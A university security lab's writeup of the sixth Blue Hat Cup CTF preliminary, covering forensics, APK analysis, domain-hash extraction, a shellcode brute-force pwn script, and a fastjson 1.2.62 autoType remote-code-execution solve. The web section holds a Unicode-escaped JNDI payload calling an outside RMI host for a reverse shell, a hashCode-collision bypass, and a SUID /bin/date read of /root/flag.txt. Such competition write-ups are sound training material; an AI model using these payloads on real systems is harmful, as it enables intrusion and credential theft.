Sixth "Blue Hat Cup" (蓝帽杯) National College Student Cybersecurity Skills Competition: partial writeups
2022-7-27 21:31:54 Author: 山警网络空间安全实验室

The "Blue Hat Cup" National College Student Cybersecurity Skills Competition is a high-profile, influential practical-skills competition open to students of police academies and general universities nationwide, and is known as the "Olympics" of future cyber police. The sixth "Blue Hat Cup" is guided by the Cybersecurity Protection Bureau of the Ministry of Public Security, the Education Management Information Center of the Ministry of Education, the China Workers' Audio-Visual Education Center of the All-China Federation of Trade Unions and the China Association for Educational Technology, and is co-hosted by the People's Public Security University of China, Beijing Institute of Technology and QI-ANXIN Technology Group Inc.

This edition has been upgraded into a comprehensive event that tests contestants' skills in network attack and defense and in digital forensics. It includes the competition itself, training sessions and a summit forum. Through the three-party cooperation covering police academies and universities nationwide, it aims to build a new, "practical, systematic and routine" mechanism for cultivating cybersecurity talent and to supply hands-on cybersecurity professionals to key national organizations.

In this preliminary round, our school's cybersecurity club achieved excellent results: seven teams advanced to the semi-finals of the Northern Division, bringing honour to the college.

  • Forensics

    • Computer Forensics 1

    • Computer Forensics 2

    • Computer Forensics 3

    • Computer Forensics 4

    • Mobile Forensics 1

    • Mobile Forensics 2

    • Website Forensics 1

    • Website Forensics 2

    • Website Forensics 3

    • Website Forensics 4

    • Program Analysis 1

    • Program Analysis 2

    • Program Analysis 3

    • Program Analysis 4

  • Misc

    • domainhacker

    • domainhacker2

  • pwn

    • EscapeShellcode

  • WEB

    • Ez_gadget

Forensics

Computer Forensics 1

volatility -f 1.dmp --profile=Win7SP1x64 mimikatz

Computer Forensics 2

volatility -f 1.dmp --profile=Win7SP1x64 pstree

MagnetRAMCaptu shows up in the process tree; the corresponding PID is 2192.

Computer Forensics 3

Use Passware Kit to recover the encryption keys from the memory dump.

Mount and decrypt the volume with 取证大师.

After exporting, brute-force the PPT with a dictionary.

Open it and get:

Computer Forensics 4

The file 新建文本文档.txt ("New Text Document.txt") is actually a TrueCrypt volume.

Again use Passware Kit with the memory dump to remove the encryption, producing test-unprotected.

Parse the decrypted TrueCrypt image with 取证大师; it contains a zip archive.

Brute-force the 6-digit numeric password: 991314.

Result:

flag{1349934913913991394cacacacacacc}

Mobile Forensics 1

Just search for the photo name and export it.

Mobile Forensics 2

Just search for 姜总.

Website Forensics 1

Scan with D盾.

The hit above is the answer.

Website Forensics 2

Found:

Tweak the snippet slightly and run it to get KBLT123.

<?php
// Decrypts the AES-128-CBC (Rijndael-128) ciphertext found in the site source.
// Needs the legacy mcrypt extension (removed from PHP core in 7.2).
$str = 'P3LMJ4uCbkFJ/RarywrCvA==';
$str = str_replace(array("\r\n", "\r", "\n"), "", $str);   // strip any line breaks
$key = 'PanGuShi';
$iv = substr(sha1($key), 0, 16);                           // IV: first 16 hex chars of sha1(key)
$td = mcrypt_module_open(MCRYPT_RIJNDAEL_128, "", MCRYPT_MODE_CBC, "");
mcrypt_generic_init($td, $key, $iv);                       // mcrypt zero-pads the 8-byte key to 16 bytes
$decode = base64_decode($str);
$decrypted = mdecrypt_generic($td, $decode);
mcrypt_generic_deinit($td);
mcrypt_module_close($td);
$decrypted = trim($decrypted);                             // drop the block padding
echo $decrypted;

Website Forensics 3

Found here: jyzg123456

Website Forensics 4

First, based on the database structure, massage the dump in Notepad into a format the script can parse.

Pull out the last column:

# -*- coding: UTF-8 -*-
# Print the last (8th) comma-separated column of every row in 7.txt
with open("7.txt", encoding='utf-8') as f:
    for line in f:
        a = line.split(', ')
        print(a[7].strip('\n'))

Tweak the site's PHP decryption script and add a loop:

<?php
// Each entry is base64(ciphertext), where ciphertext[i] = plaintext[i] + keystream[i] (mod 256)
// and the keystream is md5($key) repeated; undo it by subtracting byte for byte.
$flag = ['mZVymm9t','lpxqlXFo','l5xummto','m5Zwm3Bn','nJhtlGlm','m5tpmGtm','m5ptnGtu','mZlym25r','m5hpnHBu','m5prlm9u','nJlyl2hu','lptummhs','lpxrl21n','mZRpnHBs','mZpxm2lr','m5dtmGls','mpxvlnBv','mJpynHBt','nJZwm2lu','mpdtnWxq','nJdtlmpr','mZtymHBm','nJlslmpp','l5RunW1p','nJxplXFm','lZdpmm1s','mZZwnW9u','mJVrmmhp','lZZwl3Bs','m5xvm2hm','mpZslmpm','mZtrnGtp','lp1rm21t','nJxplmtp','l5twlXFq','lphqmm9s','m51wmG1q','mJlxlWto','lJ1vmXFq','mpVpmW5r','m5lrlGpr','mpxplm9u','lZpxnHFn','nJdymWpm','mJpum3Fo','lpRrmWto','lZtunXBv','lpprnWtt','lJdslnBr','lJZrnWpm','l5Zrm21m','lJdul2hm','mphylG9q','lZhpm2pp','lZ1qnW1s','nJ1tlHFp','mZxqm2tp','mZdsm21t','mpRvlG9o','mJVqlmhv','mJRwlHBq','l5dtmWtt','mZdylHFt','l5RqlWxn','mZ1um3Fs','lJ1rnWhu','m5pulWhv','lptrnW1u','m5xynWxn','lpRynGtr','mpxulGlm','nJdslm9r','lJhslHBq','nJpwnWhu','mptql2tv','l51xmmlp','mZVymXFn','lJhqnW5q','m5ppmGpr','mZlqm21t','mpZslWxt','mJ1pnHFm','l5drlXBp','mJlvmW1u','mZtxlG5t','nJtsnHFn','l5Rvm29o','m5xvlWxv','m5Zrl2xm','mZlwlG1u','nJpvlWtr','mJxym25s','lpVqnWxv','mZVvl3Fq','lZVtlW5m','lZRqlGhn','nJxqm2hn','nJVtl21s','lJdumWlq','mJtxmGtp','mZxsnHFv','lpdtl2xn','mphqlm5p','lJdxlGpn','lpVvlHFu','lJhvmHBn','l5xunGtv','lZRul2pt','mpdqnGxu','l5Zxlmho','lJppmWhq','nJVylWpp','m5VxnWlr','lpdsnGtq','mZ1tnGpt','mJVqmmtq','l5hslWhm','lZZtl21r','nJlumGlm','lJhsmW9t','lZZym25s','l5tpnHBt','nJVunG1q','mJdtlHFu','mpVtlnFp','mplrnG1t','mJ1ylHBr','nJhynG5m','mplymG1r','lJtxlGxo','lpRxnGlm','mZxwnG5s','mZptnWpn','mJZylGxq','mZZvm3Fo','lJdxnW9t','lZtxmXFv','nJxtlXFm','mJZumW1r','nJ1tmG1p','mplslmpu','lJZxlG5p','nJtxmXBq','lZdxmmtq','lJdrlG1o','mpZtmmlm','mJVxnGpm','mJVwmWxu','mplslWps'];
$key = md5('jyzg123456');          // 32-character hex key stream
$l = strlen($key);
foreach ($flag as $item) {
    $data = base64_decode($item);  // raw bytes, so use byte-oriented string functions, not mb_*
    $len = strlen($data);
    $str = '';
    for ($i = 0; $i < $len; $i++) {
        $k = ord($key[$i % $l]);   // key stream wraps around every 32 bytes
        $str .= chr((ord($data[$i]) - $k + 256) % 256);
    }
    echo $str, "\n";
}

Result:

['619677','381192','485632','827781','944010','870430','864838','659765','840888','862278','959308','375606','382351','600886','668715','834416','786289','569887','927718','734944','934225','679480','953223','405953','980190','230656','627978','512603','227386','886700','723220','672833','392757','980233','477194','341676','897454','558132','196594','710565','852025','780278','268891','939520','565792','302532','275989','362937','133285','122920','422750','135300','749074','240723','291956','994093','681733','633757','706072','511209','507084','434537','639097','401141','695796','192908','865109','372958','889941','309835','785010','933275','143084','967908','771339','498613','619591','141964','860425','651757','723147','590890','432183','556558','678067','973891','406772','886149','822340','657058','966135','589766','311949','616394','214160','201001','981701','914356','135514','578433','683899','334341','741263','138021','316098','146481','485839','205327','731848','428202','160504','919123','818915','333834','694827','511634','443100','224355','955410','143577','229766','470887','915854','534098','714293','752857','599085','949860','759455','178042','308810','687866','664921','529044','626792','138977','278599','984190','525555','994453','753228','128063','978584','238634','132052','724610','518820','517548','753126']
# -*- coding: UTF-8 -*-
# Replace the last column of each row in 6.txt with the corresponding decrypted value
m = ['619677','381192','485632','827781','944010','870430','864838','659765','840888','862278','959308','375606','382351','600886','668715','834416','786289','569887','927718','734944','934225','679480','953223','405953','980190','230656','627978','512603','227386','886700','723220','672833','392757','980233','477194','341676','897454','558132','196594','710565','852025','780278','268891','939520','565792','302532','275989','362937','133285','122920','422750','135300','749074','240723','291956','994093','681733','633757','706072','511209','507084','434537','639097','401141','695796','192908','865109','372958','889941','309835','785010','933275','143084','967908','771339','498613','619591','141964','860425','651757','723147','590890','432183','556558','678067','973891','406772','886149','822340','657058','966135','589766','311949','616394','214160','201001','981701','914356','135514','578433','683899','334341','741263','138021','316098','146481','485839','205327','731848','428202','160504','919123','818915','333834','694827','511634','443100','224355','955410','143577','229766','470887','915854','534098','714293','752857','599085','949860','759455','178042','308810','687866','664921','529044','626792','138977','278599','984190','525555','994453','753228','128063','978584','238634','132052','724610','518820','517548','753126']
with open("6.txt", encoding='utf-8') as f:
    for i, line in enumerate(f):
        a = line.split(', ')
        a[7] = m[i]
        print(a)

Substitute the values with the script above, batch-process the result in Notepad, and group by date to get:

Multiply:

# -*- coding: UTF-8 -*-
# Multiply column 4 (a float) by column 8 (the decrypted integer) for every row in 7.txt
with open("7.txt", encoding='utf-8') as f:
    for line in f:
        a = line.split(', ')
        print(float(a[3]) * int(a[7].strip('\n')))

The trailing digits are floating-point artifacts; ignore them and just add the values up.

Then sum:

# Sum the per-row products computed above
flag = [24787.08,15247.68,19425.28,33111.24,37760.4,34817.2,34593.520000000004,26390.600000000002,33635.520000000004,34491.12,38372.32,15024.24,15294.04,36053.159999999996,40122.9,50064.96,47177.34,34193.22,55663.079999999994,44096.64,56053.5,40768.799999999996,57193.38,20297.65,49009.5,11532.800000000001,31398.9,25630.15,11369.300000000001,44335.0,36161.0,33641.65,19637.850000000002,49011.65,33403.58,23917.320000000003,62821.780000000006,39069.240000000005,13761.580000000002,49739.55,59641.75000000001,54619.46000000001,18822.370000000003,93952.0,56579.200000000004,30253.2,27598.9,36293.700000000004,13328.5,18438.0,63412.5,20295.0,112361.09999999999,36108.45,43793.4,149113.94999999998,102259.95,95063.55,105910.8,76681.34999999999,76062.59999999999,73871.29000000001,108646.49,68193.97,118285.32,32794.36,147068.53,63402.86000000001,151289.97,52671.950000000004,133451.7,158656.75,24324.280000000002,164544.36000000002,177407.97,114680.99,142505.93,32651.72,197897.75,149904.11000000002,166323.81,129995.8,95080.26,122442.76,149174.74,214256.02,89489.84,194952.78,180914.8,164264.5,241533.75,147441.5,77987.25,154098.5,53540.0,50250.25,245425.25,228589.0,39299.06,167745.56999999998,198330.71,96958.89,214966.27,40026.09,63219.600000000006,29296.2,97167.8,41065.4,146369.6,85640.40000000001,32100.800000000003,183824.6,163783.0,93473.52,194551.56000000003,143257.52000000002,124068.00000000001,62819.40000000001,267514.80000000005,40201.560000000005,75822.78,155392.71000000002,302231.82,176252.34,235716.69,248442.81,197698.05000000002,313453.8,250620.15000000002,62314.7,108083.5,240753.09999999998,232722.34999999998,185165.4,219377.19999999998,48641.95,97509.65,344466.5,183944.25,348058.55,263629.8,44822.049999999996,342504.39999999997,88294.58,48859.24,268105.7,191963.4,191492.76,278656.62]
p = sum(flag)
print(p)

Result: 15758353.76

Program Analysis 1

在线分析:https://mogua.co/static_analyzer/?name=EXEC.apk&checksum=4606097ab3e8b7f42e8628996fdd4a62&type=apk

Program Analysis 2

android.intent.action.MAIN marks the entry activity; it is declared in this XML, where we find it.

Program Analysis 3

A base64 string is right there at the entry point; decoding it gives a URL, which is accepted as the answer.

Program Analysis 4

Kept scrolling through the source until reaching this spot; there is a security check here, so this should be the right place.

There is an f(d.a.a.c.a.a(this)) call doing the check; following it into d.a.a.c.a, the class name is a.

Misc

domainhacker

Extract a zip archive from the traffic capture.

The traffic is AntSword (蚁剑) webshell traffic, and it contains the archive password.

Unzip, find the corresponding NTLM hash, and wrap it in flag{}.

domainhacker2

Same as above, the archive password is: FakePassword123$

Then, following https://www.freebuf.com/articles/network/251267.html on extracting domain hashes from NTDS.dit, run secretsdump.py from https://github.com/SecureAuthCorp/impacket and it is done in one go.

pwn

EscapeShellcode

We have to write shellcode. The program has already done the "o" and "r" (open and read) for us; we only need to "w" (write) out the flag, which sits in the bss segment.

By the time execution reaches our shellcode, every register except rip has been cleared,

so no other address is available: the only option is lea r13, [rip] to move the address held in rip into r13.

However, the offset between the flag address and the heap address is randomized, so three digits have to be brute-forced.

We can then treat the rest as a fixed offset and iterate over it.

Script:

from pwn import *
context(log_level='debug', os='linux', arch='amd64')
s    = lambda data: p.send(data)
sa   = lambda delim, data: p.sendafter(delim, data)
sl   = lambda data: p.sendline(data)
sla  = lambda delim, data: p.sendlineafter(delim, data)
r    = lambda num: p.recv(num)
ru   = lambda delims, drop=True: p.recvuntil(delims, drop)
itr  = lambda: p.interactive()
uu32 = lambda data: u32(data.ljust(4, b'\x00'))
uu64 = lambda data: u64(data.ljust(8, b'\x00'))
leak = lambda name, addr: log.success('{} = {:#x}'.format(name, addr))

for i in range(9999):
    p = remote("39.107.124.203", 16714)
    #p = process('./escape_shellcode')

    num = 0x1000 * i  # candidate page-granular distance to try on this iteration
    shellcode = '''
    lea r13, [rip]
    sub r13, 0x351
    add r13, 0x120
    sub r13, {}
    mov rdi, 1
    mov rsi, r13
    mov rax, 1
    mov rdx, 0xff
    syscall
    '''.format(num)

    sl(asm(shellcode))
    p.close()

Let it brute-force automatically.

WEB

Ez_gadget

Decompiling gives the main source:

  • JSONController.java
package com.example.spring;   // the decompiler printed "BOOT-INF.classes.com.example.spring"; the real package is com.example.spring

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.ParserConfig;
import com.example.spring.secret;
import java.util.Objects;
import java.util.regex.Pattern;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.ResponseBody;

@Controller
public class JSONController
{
  @ResponseBody
  @RequestMapping({"/"})
  public String hello() { return "Your key is:" + secret.getKey(); }

  @ResponseBody
  @RequestMapping({"/json"})
  public String Unserjson(@RequestParam String str, @RequestParam String input) throws Exception {
    if (str != null
        && Objects.hashCode(str) == secret.getKey().hashCode()
        && !secret.getKey().equals(str)) {                          // bypass 1: hashCode() must match, but str must not be the key itself
      String pattern = ".*rmi.*|.*jndi.*|.*ldap.*|.*\\\\x.*";      // bypass 2: keyword blacklist applied to the raw input
      Pattern p = Pattern.compile(pattern, Pattern.CASE_INSENSITIVE); // the decompiler showed the flag as its numeric value, 2
      boolean StrMatch = p.matcher(input).matches();
      if (StrMatch) {
        return "Hacker get out!!!";
      }
      ParserConfig.getGlobalInstance().setAutoTypeSupport(true);   // enables fastjson autoType globally
      JSON.parseObject(input);
    }
    return "hello";
  }
}

This is the fastjson 1.2.62 RCE vulnerability, but two checks have to be bypassed. The first is the hashCode() comparison against the key string; the 虎符CTF2022 ezchain challenge covers exactly this.

The two strings only need to produce the same hashCode.

Visit the target environment to obtain the key:

Following the approach in the article above, a key string that satisfies the check is easily computed:

k0R7AqTK5czIIfbk

That gets past the first restriction; the second one is bypassed simply by Unicode-escaping the keywords:

{"@type":"\u006f\u0072\u0067\u002e\u0061\u0070\u0061\u0063\u0068\u0065\u002e\u0078\u0062\u0065\u0061\u006e\u002e\u0070\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0065\u0064\u0069\u0074\u006f\u0072\u002e\u004a\u006e\u0064\u0069\u0043\u006f\u006e\u0076\u0065\u0072\u0074\u0065\u0072","AsText":"\u0072\u006d\u0069://47.117.125.220:1099/iqfcrq"}

Send the following payload and a reverse shell comes back:

str=k0R7AqTK5czIIfbk&input={"@type":"\u006f\u0072\u0067\u002e\u0061\u0070\u0061\u0063\u0068\u0065\u002e\u0078\u0062\u0065\u0061\u006e\u002e\u0070\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0065\u0064\u0069\u0074\u006f\u0072\u002e\u004a\u006e\u0064\u0069\u0043\u006f\u006e\u0076\u0065\u0072\u0074\u0065\u0072","AsText":"\u0072\u006d\u0069://47.117.125.220:1099/iqfcrq"}
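As an added illustration (not code from the writeup or the challenge), the two gates of Unserjson re-implemented in Python with constructed inputs: Java's String.hashCode() admits collisions, so the hashCode() comparison passes for a string that is not the key, and a blacklist matched against the raw request body never sees keywords hidden behind JSON \uXXXX escapes that the parser decodes later. The hardened variant compares the secret in constant time and runs the keyword check on decoded values; the collision pair "Aa"/"BB" and the escaped body are constructed examples.

```python
import hmac
import json
import re

# Java String.hashCode(): h = 31*h + c over UTF-16 code units, wrapped to a signed 32-bit int
def java_string_hash(s: str) -> int:
    h = 0
    units = s.encode("utf-16-be")
    for i in range(0, len(units), 2):
        h = (31 * h + int.from_bytes(units[i:i + 2], "big")) & 0xFFFFFFFF
    return h - 0x100000000 if h >= 0x80000000 else h

# Same regex as the controller; Java's matches() is a whole-string match, hence fullmatch()
BLACKLIST = re.compile(r".*rmi.*|.*jndi.*|.*ldap.*|.*\\x.*", re.IGNORECASE)

# Constructed request body: the keyword "rmi" is spelled with JSON \u escapes, nothing real behind it
RAW_ESCAPED = '{"@type":"\\u0072\\u006d\\u0069.Placeholder","AsText":"\\u0072\\u006d\\u0069://placeholder"}'

def vulnerable_gate(str_param: str, key: str, body: str) -> bool:
    """True when the request would reach JSON.parseObject() in the original controller."""
    hash_ok = java_string_hash(str_param) == java_string_hash(key) and str_param != key
    blacklist_ok = BLACKLIST.fullmatch(body) is None   # checked on the raw, still-escaped text
    return hash_ok and blacklist_ok

def _strings(value):
    """Yield every string (keys and values) in a decoded JSON document."""
    if isinstance(value, str):
        yield value
    elif isinstance(value, dict):
        for k, v in value.items():
            yield k
            yield from _strings(v)
    elif isinstance(value, list):
        for v in value:
            yield from _strings(v)

def hardened_gate(str_param: str, key: str, body: str) -> bool:
    """Constant-time check of the real secret, then the keyword check on decoded values.
    (The actual fix is to leave fastjson autoType disabled; this only closes the two gates.)"""
    if not hmac.compare_digest(str_param.encode(), key.encode()):
        return False
    try:
        doc = json.loads(body)          # decoding resolves the \uXXXX escapes
    except ValueError:
        return False
    return not any(BLACKLIST.fullmatch(s) for s in _strings(doc))
```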

The flag is in /root/flag.txt; read it after escalating privileges through the SUID binary:

/bin/date -f /root/flag.txt

Source: http://mp.weixin.qq.com/s?__biz=MjM5Njc1OTYyNA==&mid=2450783623&idx=1&sn=5afa643e54c0a051674a444bab85b254&chksm=b1030ca0867485b6c27c7eba36dce75af7569f8792d5d384a4d13faf601598b7497d9b0cb451#rd